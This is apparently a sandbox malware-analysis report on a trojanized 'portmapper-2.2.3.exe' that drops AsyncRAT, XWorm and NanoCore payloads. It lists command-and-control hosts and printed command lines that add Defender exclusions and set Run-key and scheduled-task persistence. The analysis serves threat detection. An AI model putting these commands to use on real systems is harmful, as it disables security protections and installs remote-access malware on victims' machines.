asyncrat | e5f62be708a0caa8b4e5dfcf07127eabc49a8a61a300f434367718b7e7c2e7e3

Analysis

max time kernel
46s
max time network
49s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
17-09-2024 14:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

portmapper-2.2.3.exe
Size

5.2MB
MD5

9f14a0573f96ce3c3374044e585f7eb0
SHA1

88247dac3c2a4e5a760c215436a99afe9ad5577f
SHA256

e5f62be708a0caa8b4e5dfcf07127eabc49a8a61a300f434367718b7e7c2e7e3
SHA512

f1e5af30c5c251a294998eb15cef22d22c6e30c900e08d86721ad3bfe400b86b8866c8ec66082014f3f3da2fb576a4cf35f1ff9e1f36d1dad26403fa96f9f91b
SSDEEP

98304:rqw3fQlyOEaEyr9QsYhzAkSuwnu0J74Ijb4eDaJo99AXvhdkfx5:rqw3fsVPYa7J7zjxae7iZdK

Score

10^/10

asyncrat nanocore xworm default defense_evasion discovery evasion execution keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:3232

l838.ddns.net:3232

0x365c3e6EeF15a2938FC7267D5A3386c8e23aBc5F:123

Attributes

Install_directory
%ProgramData%
install_file
Windows Security Wrapper.exe

Extracted

Family

asyncrat

Version

L838 RAT v1.0.0

Botnet

Default

127.0.0.1:54984

l838.ddns.net:54984

Mutex

kswxiqghhjgkjqpqzz

Attributes

delay
3
install
true
install_file
Windows Service Wrapper.exe
install_folder
%programdata%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000700000002358c-41.dat	family_xworm
behavioral1/memory/4804-73-0x00000000006E0000-0x00000000006F8000-memory.dmp	family_xworm

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000700000002358d-44.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4960	powershell.exe
3720	powershell.exe
4012	powershell.exe
412	powershell.exe
3608	powershell.exe
4716	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	portmapper-2.2.3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	PortServices.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WindowsSmartScreen.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Wrapper.lnk	WindowsSmartScreen.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Wrapper.lnk	WindowsSmartScreen.exe

Executes dropped EXE 4 IoCs

pid	Process
3188	PortServices.exe
4804	WindowsSmartScreen.exe
1560	WindowsDriverFoundation.exe
3624	trellrt.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdateWindowsSmartScreen = "C:\\Users\\Admin\\WindowsSmartScreen.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdateWindowsDriverFoundation = "C:\\Users\\Admin\\WindowsDriverFoundation.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Wrapper = "C:\\ProgramData\\Windows Security Wrapper.exe"	WindowsSmartScreen.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	trellrt.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PortServices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	trellrt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	portmapper-2.2.3.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4144	schtasks.exe
3256	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4804	WindowsSmartScreen.exe

Suspicious behavior: EnumeratesProcesses 57 IoCs

pid	Process
4292	powershell.exe
4292	powershell.exe
4960	powershell.exe
4960	powershell.exe
4960	powershell.exe
4292	powershell.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
4012	powershell.exe
4012	powershell.exe
4012	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
3608	powershell.exe
3608	powershell.exe
3608	powershell.exe
4716	powershell.exe
4716	powershell.exe
4716	powershell.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe
3624	trellrt.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3624	trellrt.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

description	pid	Process
Token: SeDebugPrivilege	4804	WindowsSmartScreen.exe
Token: SeDebugPrivilege	1560	WindowsDriverFoundation.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	3624	trellrt.exe
Token: SeIncreaseQuotaPrivilege	1560	WindowsDriverFoundation.exe
Token: SeSecurityPrivilege	1560	WindowsDriverFoundation.exe
Token: SeTakeOwnershipPrivilege	1560	WindowsDriverFoundation.exe
Token: SeLoadDriverPrivilege	1560	WindowsDriverFoundation.exe
Token: SeSystemProfilePrivilege	1560	WindowsDriverFoundation.exe
Token: SeSystemtimePrivilege	1560	WindowsDriverFoundation.exe
Token: SeProfSingleProcessPrivilege	1560	WindowsDriverFoundation.exe
Token: SeIncBasePriorityPrivilege	1560	WindowsDriverFoundation.exe
Token: SeCreatePagefilePrivilege	1560	WindowsDriverFoundation.exe
Token: SeBackupPrivilege	1560	WindowsDriverFoundation.exe
Token: SeRestorePrivilege	1560	WindowsDriverFoundation.exe
Token: SeShutdownPrivilege	1560	WindowsDriverFoundation.exe
Token: SeDebugPrivilege	1560	WindowsDriverFoundation.exe
Token: SeSystemEnvironmentPrivilege	1560	WindowsDriverFoundation.exe
Token: SeRemoteShutdownPrivilege	1560	WindowsDriverFoundation.exe
Token: SeUndockPrivilege	1560	WindowsDriverFoundation.exe
Token: SeManageVolumePrivilege	1560	WindowsDriverFoundation.exe
Token: 33	1560	WindowsDriverFoundation.exe
Token: 34	1560	WindowsDriverFoundation.exe
Token: 35	1560	WindowsDriverFoundation.exe
Token: 36	1560	WindowsDriverFoundation.exe
Token: SeIncreaseQuotaPrivilege	1560	WindowsDriverFoundation.exe
Token: SeSecurityPrivilege	1560	WindowsDriverFoundation.exe
Token: SeTakeOwnershipPrivilege	1560	WindowsDriverFoundation.exe
Token: SeLoadDriverPrivilege	1560	WindowsDriverFoundation.exe
Token: SeSystemProfilePrivilege	1560	WindowsDriverFoundation.exe
Token: SeSystemtimePrivilege	1560	WindowsDriverFoundation.exe
Token: SeProfSingleProcessPrivilege	1560	WindowsDriverFoundation.exe
Token: SeIncBasePriorityPrivilege	1560	WindowsDriverFoundation.exe
Token: SeCreatePagefilePrivilege	1560	WindowsDriverFoundation.exe
Token: SeBackupPrivilege	1560	WindowsDriverFoundation.exe
Token: SeRestorePrivilege	1560	WindowsDriverFoundation.exe
Token: SeShutdownPrivilege	1560	WindowsDriverFoundation.exe
Token: SeDebugPrivilege	1560	WindowsDriverFoundation.exe
Token: SeSystemEnvironmentPrivilege	1560	WindowsDriverFoundation.exe
Token: SeRemoteShutdownPrivilege	1560	WindowsDriverFoundation.exe
Token: SeUndockPrivilege	1560	WindowsDriverFoundation.exe
Token: SeManageVolumePrivilege	1560	WindowsDriverFoundation.exe
Token: 33	1560	WindowsDriverFoundation.exe
Token: 34	1560	WindowsDriverFoundation.exe
Token: 35	1560	WindowsDriverFoundation.exe
Token: 36	1560	WindowsDriverFoundation.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	4804	WindowsSmartScreen.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3188	PortServices.exe

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 2980 wrote to memory of 3188	2980	portmapper-2.2.3.exe	89
PID 2980 wrote to memory of 3188	2980	portmapper-2.2.3.exe	89
PID 2980 wrote to memory of 3188	2980	portmapper-2.2.3.exe	89
PID 3188 wrote to memory of 4292	3188	PortServices.exe	91
PID 3188 wrote to memory of 4292	3188	PortServices.exe	91
PID 3188 wrote to memory of 4292	3188	PortServices.exe	91
PID 3188 wrote to memory of 4804	3188	PortServices.exe	93
PID 3188 wrote to memory of 4804	3188	PortServices.exe	93
PID 3188 wrote to memory of 1560	3188	PortServices.exe	94
PID 3188 wrote to memory of 1560	3188	PortServices.exe	94
PID 3188 wrote to memory of 3776	3188	PortServices.exe	95
PID 3188 wrote to memory of 3776	3188	PortServices.exe	95
PID 3188 wrote to memory of 3776	3188	PortServices.exe	95
PID 3188 wrote to memory of 3624	3188	PortServices.exe	97
PID 3188 wrote to memory of 3624	3188	PortServices.exe	97
PID 3188 wrote to memory of 3624	3188	PortServices.exe	97
PID 2980 wrote to memory of 5116	2980	portmapper-2.2.3.exe	98
PID 2980 wrote to memory of 5116	2980	portmapper-2.2.3.exe	98
PID 3776 wrote to memory of 4960	3776	cmd.exe	99
PID 3776 wrote to memory of 4960	3776	cmd.exe	99
PID 3776 wrote to memory of 4960	3776	cmd.exe	99
PID 3624 wrote to memory of 4144	3624	trellrt.exe	112
PID 3624 wrote to memory of 4144	3624	trellrt.exe	112
PID 3624 wrote to memory of 4144	3624	trellrt.exe	112
PID 3776 wrote to memory of 3720	3776	cmd.exe	108
PID 3776 wrote to memory of 3720	3776	cmd.exe	108
PID 3776 wrote to memory of 3720	3776	cmd.exe	108
PID 4804 wrote to memory of 4012	4804	WindowsSmartScreen.exe	109
PID 4804 wrote to memory of 4012	4804	WindowsSmartScreen.exe	109
PID 4804 wrote to memory of 412	4804	WindowsSmartScreen.exe	113
PID 4804 wrote to memory of 412	4804	WindowsSmartScreen.exe	113
PID 3776 wrote to memory of 4556	3776	cmd.exe	115
PID 3776 wrote to memory of 4556	3776	cmd.exe	115
PID 3776 wrote to memory of 4556	3776	cmd.exe	115
PID 3776 wrote to memory of 1988	3776	cmd.exe	116
PID 3776 wrote to memory of 1988	3776	cmd.exe	116
PID 3776 wrote to memory of 1988	3776	cmd.exe	116
PID 3776 wrote to memory of 3836	3776	cmd.exe	117
PID 3776 wrote to memory of 3836	3776	cmd.exe	117
PID 3776 wrote to memory of 3836	3776	cmd.exe	117
PID 3776 wrote to memory of 2960	3776	cmd.exe	118
PID 3776 wrote to memory of 2960	3776	cmd.exe	118
PID 3776 wrote to memory of 2960	3776	cmd.exe	118
PID 3776 wrote to memory of 2592	3776	cmd.exe	119
PID 3776 wrote to memory of 2592	3776	cmd.exe	119
PID 3776 wrote to memory of 2592	3776	cmd.exe	119
PID 3776 wrote to memory of 760	3776	cmd.exe	130
PID 3776 wrote to memory of 760	3776	cmd.exe	130
PID 3776 wrote to memory of 760	3776	cmd.exe	130
PID 4804 wrote to memory of 3608	4804	WindowsSmartScreen.exe	121
PID 4804 wrote to memory of 3608	4804	WindowsSmartScreen.exe	121
PID 4804 wrote to memory of 4716	4804	WindowsSmartScreen.exe	124
PID 4804 wrote to memory of 4716	4804	WindowsSmartScreen.exe	124
PID 4804 wrote to memory of 3256	4804	WindowsSmartScreen.exe	126
PID 4804 wrote to memory of 3256	4804	WindowsSmartScreen.exe	126

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\portmapper-2.2.3.exe
"C:\Users\Admin\AppData\Local\Temp\portmapper-2.2.3.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2980
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\PortServices.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PortServices.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAegBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAdAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYwBoACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4292
- - C:\Users\Admin\WindowsSmartScreen.exe
    "C:\Users\Admin\WindowsSmartScreen.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\WindowsSmartScreen.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSmartScreen.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Security Wrapper.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Wrapper.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4716
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Security Wrapper" /tr "C:\ProgramData\Windows Security Wrapper.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3256
- - C:\Users\Admin\WindowsDriverFoundation.exe
    "C:\Users\Admin\WindowsDriverFoundation.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\STEALER.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3776
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Disabling-WindowsRecoveryEnvironment"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4960
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\WindowsExecutables'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3720
  - - C:\Windows\SysWOW64\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4556
  - - C:\Windows\SysWOW64\find.exe
      find /i "SystemUpdateWindowsSmartScreen"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1988
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdateWindowsSmartScreen" /t REG_SZ /d "C:\Users\Admin\WindowsSmartScreen.exe" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:3836
  - - C:\Windows\SysWOW64\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2960
  - - C:\Windows\SysWOW64\find.exe
      find /i "SystemUpdateWindowsDriverFoundation"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2592
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdateWindowsDriverFoundation" /t REG_SZ /d "C:\Users\Admin\WindowsDriverFoundation.exe" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:760
- - C:\Users\Admin\AppData\Roaming\trellrt.exe
    "C:\Users\Admin\AppData\Roaming\trellrt.exe"
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3624
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "WPA Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmp72B2.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4144
- C:\Program Files\Java\jre-1.8\bin\javaw.exe
  "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\RarSFX0\portmapper-2.2.3.jar"
  2⤵
  PID:5116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4512,i,16315016104747277319,5510969007830467313,262144 --variations-seed-version --mojo-platform-channel-handle=4628 /prefetch:8
1⤵
PID:3864

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4144

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:760

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
3dfd6c7e53479c05747c05093809673a

SHA1
6e70274ac6c8d83d0d509813e20d7151bb002e30

SHA256
e65b11c2a3d1d6edf90a766e765699ac25dc659262094930999303ca654cb137

SHA512
df65d74acfeed671b5b25fe4016f8d2509d4113657a506fbd59518bd9656f6a629f6a48b00bb3e77fc95292745f81270f27a6e2fa71cfec4c2bbe2d2f12be82a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e922db9741aa037f641f215941c4a04a

SHA1
6c67f2f9212024a1a4ae36011b93fef22fbdc404

SHA256
f2a873fd782bebd291cdad42777f3b2c75005e82bdccf91877e27ffb2ae802de

SHA512
d6a69ad325740341fd9be44f645da9d731a8b77e01476753dffb7886644ca7dc2dbbcc03761f19d7da324ac5ddda7142f71210b85118f8b90b2d0a55e31b99ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4920f7bec7cdb8ac44637a6af9d2fc6f

SHA1
d4c5e3c9397926ec9bdaccdd955e89f5138b1816

SHA256
8cc607eab702c5690ee5d64f5d34add46b7093c23751506dad728853a434a277

SHA512
321e8178ebd08d680c6d1af467ab73e3055af8c8bb06ee81b1af46bd6718e5a060c339da5a281028c2557ab8d85172921e10363ccd8d411aa0e75f62119838d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PortServices.exe

Filesize
353KB

MD5
565ab186944e5842406ab4f9d74f46f5

SHA1
224bd1ca4711683c583945b3d6ecab5e5c639470

SHA256
679d4c6a8111b4948639cc03794708f234501e052b2ebe0451a3d8bcbc379328

SHA512
14b493887904eedcc55e2acf48196f4299a3e88a458ba75477a96796d644f5b11245f038cc0479d44bf58ea071c6a383a90c494654f775de4810ab2bb8129de8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\portmapper-2.2.3.jar

Filesize
5.0MB

MD5
df6057d0eeba1ab4266dd271536f1298

SHA1
8be95aa1a26c4c4328ca6c5a98ba34766f748102

SHA256
aa5f3fb51ff107a38aaf07537e79754d94855fbe62f95a8cb702d7eeed928b6e

SHA512
f291051434229931681a55afb313f0f595de52c0d176155343c3e05fa73a5378451a203be061265cf696a5f334190a1a8060b513ee6bc9e838efda5b26c06795

Download Submit
C:\Users\Admin\AppData\Local\Temp\STEALER.bat

Filesize
1KB

MD5
1f69a22a7a1b2d2fd521ce21eb188c8f

SHA1
e966e6e359bb9e7b77ed74e77375145e5cd21fdd

SHA256
54585cad234b01400a62516b60260366f8bf29fde4aaebd81cb6b1d4bfe0cce7

SHA512
905699190d5ee151ce34900920720e955a328a4d5012542529c8e22ccebcf96d0ab18f4b3977e3f1b65a41c52a7f2ede61ceff4eb07a9a66f8bf41ac7002d755

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gnnvod33.dxn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp72B2.tmp

Filesize
1KB

MD5
c959800473a9762a191d5458383878a6

SHA1
b4e211472e313711cd59ada511b0d9ad38ed7ff3

SHA256
de79f0647decf1c96baa7c71f984a23f651745a047cc5d979f42824efc3ce701

SHA512
239dd7b34a46fd5abb06d81a979b0586e9a129293248df0afdc403e3be22671df0a1d422e5e9270d8fbe5faae415b4fff9fa747aa32ef695177c4ced38688128

Download Submit
C:\Users\Admin\AppData\Roaming\trellrt.exe

Filesize
203KB

MD5
40b631e57ce22a4b52cb382cc44204c9

SHA1
58f46159e4cd20044d60c2572b91f6d48e9afafd

SHA256
338c3e0d6dc067eb96eba389e63f60621bcd5b3573bf0e6fd73dced54fe55d7a

SHA512
